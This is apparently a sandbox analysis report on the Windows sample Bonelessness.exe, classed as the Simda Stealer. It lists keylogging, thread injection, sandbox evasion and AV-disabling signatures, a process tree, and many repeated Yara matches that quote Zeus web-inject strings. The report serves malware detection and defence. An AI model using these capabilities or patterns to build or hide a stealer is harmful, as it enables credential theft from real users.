Edit tour

Windows Analysis Report
Bonelessness.exe

Overview

General Information

Sample name:	Bonelessness.exe
Analysis ID:	1498165
MD5:	475feaf47584ea0673437174181f5019
SHA1:	be7f60898bf6e108aadc370b7ba9c3135bbfb4ee
SHA256:	55bfe580ad47b8c5981ee39c1b267903ded5888ae93c474b19e31f18caa05e51
Tags:	exeshiz
Infos:

Detection

Simda Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Simda Stealer

AI detected suspicious sample

Allocates memory in foreign processes

Checks if browser processes are running

Contains VNC / remote desktop functionality (version string found)

Contains functionality to behave differently if execute on a Russian/Kazak computer

Contains functionality to capture and log keystrokes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)

Contains functionality to infect the boot sector

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking mutex)

Found evasive API chain (may stop execution after checking volume information)

Found evasive API chain checking for user administrative privileges

Found stalling execution ending in API Sleep call

Injects a PE file into a foreign processes

Machine Learning detection for sample

Monitors registry run keys for changes

Moves itself to temp directory

Queries Google from non browser process on port 80

Queries random domain names (often used to prevent blacklisting and sinkholes)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to resolve many domain names, but no domain seems valid

Uses known network protocols on non-standard ports

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Connects to many different domains

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to create system tasks

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Entry point lies outside standard sections

Executes massive DNS lookups (> 100)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (might use process or thread times for sandbox detection)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Uncommon Svchost Parent Process

Too many similar processes found

Tries to disable installed Antivirus / HIPS / PFW

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Bonelessness.exe (PID: 6696 cmdline: "C:\Users\user\Desktop\Bonelessness.exe" MD5: 475FEAF47584EA0673437174181F5019)

svchost.exe (PID: 6720 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: 579DA5BACB532A6B1670BE4418070F62)

JbrLYfXaOpqnSngA.exe (PID: 6260 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 8032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)

JbrLYfXaOpqnSngA.exe (PID: 6216 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 8048 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 732 MD5: C31336C1EFC2CCB44B4326EA793040F2)

JbrLYfXaOpqnSngA.exe (PID: 3496 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 8136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3496 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)

JbrLYfXaOpqnSngA.exe (PID: 7140 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

WerFault.exe (PID: 180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 760 MD5: C31336C1EFC2CCB44B4326EA793040F2)

JbrLYfXaOpqnSngA.exe (PID: 7124 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 7088 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 7064 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 7040 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 7024 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 7008 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 6988 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 6968 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 6944 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 6920 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 6896 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

JbrLYfXaOpqnSngA.exe (PID: 6876 cmdline: "C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

svchost.exe (PID: 7908 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 7976 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6216 -ip 6216 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7984 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6260 -ip 6260 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 8100 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3496 -ip 3496 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3468 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 7140 -ip 7140 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5600 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7124 -ip 7124 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6064 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7088 -ip 7088 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7684 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7064 -ip 7064 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7672 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 7040 -ip 7040 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7772 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7024 -ip 7024 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7780 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7008 -ip 7008 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3912 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6988 -ip 6988 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7576 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6968 -ip 6968 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 2060 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 6944 -ip 6944 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7092 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6920 -ip 6920 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 3808 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6896 -ip 6896 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000000.00000003.1654666785.0000000000868000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ec70:$a1: name=%s&port=%u 0x4e408:$a2: data_inject 0x4e5f8:$a3: keylog.txt 0x4e29d:$a4: User-agent: %s]]] 0x4edc4:$a5: %s\%02d.bmp
00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4e810:$a1: name=%s&port=%u 0x4dfa8:$a2: data_inject 0x4e198:$a3: keylog.txt 0x4de3d:$a4: User-agent: %s]]] 0x4e964:$a5: %s\%02d.bmp
0000001B.00000002.2072516404.00000000024E0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000017.00000002.2056609084.0000000000C40000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000006.00000002.2205687286.0000000002440000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
0000001B.00000002.2072302801.0000000002340000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000001.00000003.2056864277.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000019.00000002.2061047580.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000001.00000003.2658112524.0000000000A00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2089951115.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000001.00000003.2092414435.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2076160322.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2100192299.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0000001F.00000002.2078765056.00000000008B0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000001.00000003.2013590988.0000000003C60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000023.00000002.2083592694.0000000002E90000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2104389897.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
0000001D.00000002.2073597993.00000000032C0000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000001.00000003.2657998590.0000000000A00000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2092245868.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2049697984.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2106348452.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000006.00000002.2204387165.0000000000D50000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2100466451.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2104185597.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2086934819.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_SimdaStealer	Yara detected Simda Stealer	Joe Security
00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4fc10:$a1: name=%s&port=%u 0x4f3a8:$a2: data_inject 0x4f598:$a3: keylog.txt 0x4f23d:$a4: User-agent: %s]]] 0x4fd64:$a5: %s\%02d.bmp
00000017.00000002.2056409914.0000000000B90000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000021.00000002.2080968370.0000000002B40000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x49e10:$a1: name=%s&port=%u 0x495a8:$a2: data_inject 0x49798:$a3: keylog.txt 0x4943d:$a4: User-agent: %s]]] 0x49f64:$a5: %s\%02d.bmp
00000001.00000003.2107336667.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2091862945.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2011412007.0000000003C60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000021.00000002.2080530935.0000000002960000.00000040.00000001.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x4ac10:$a1: name=%s&port=%u 0x4a3a8:$a2: data_inject 0x4a598:$a3: keylog.txt 0x4a23d:$a4: User-agent: %s]]] 0x4ad64:$a5: %s\%02d.bmp
00000001.00000003.2072543768.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2052599017.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2086358360.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
00000001.00000003.2091561491.00000000039E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Zeus_e51c60d7	Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature.	unknown	0x48c10:$a1: name=%s&port=%u 0x483a8:$a2: data_inject 0x48598:$a3: keylog.txt 0x4823d:$a4: User-agent: %s]]] 0x48d64:$a5: %s\%02d.bmp
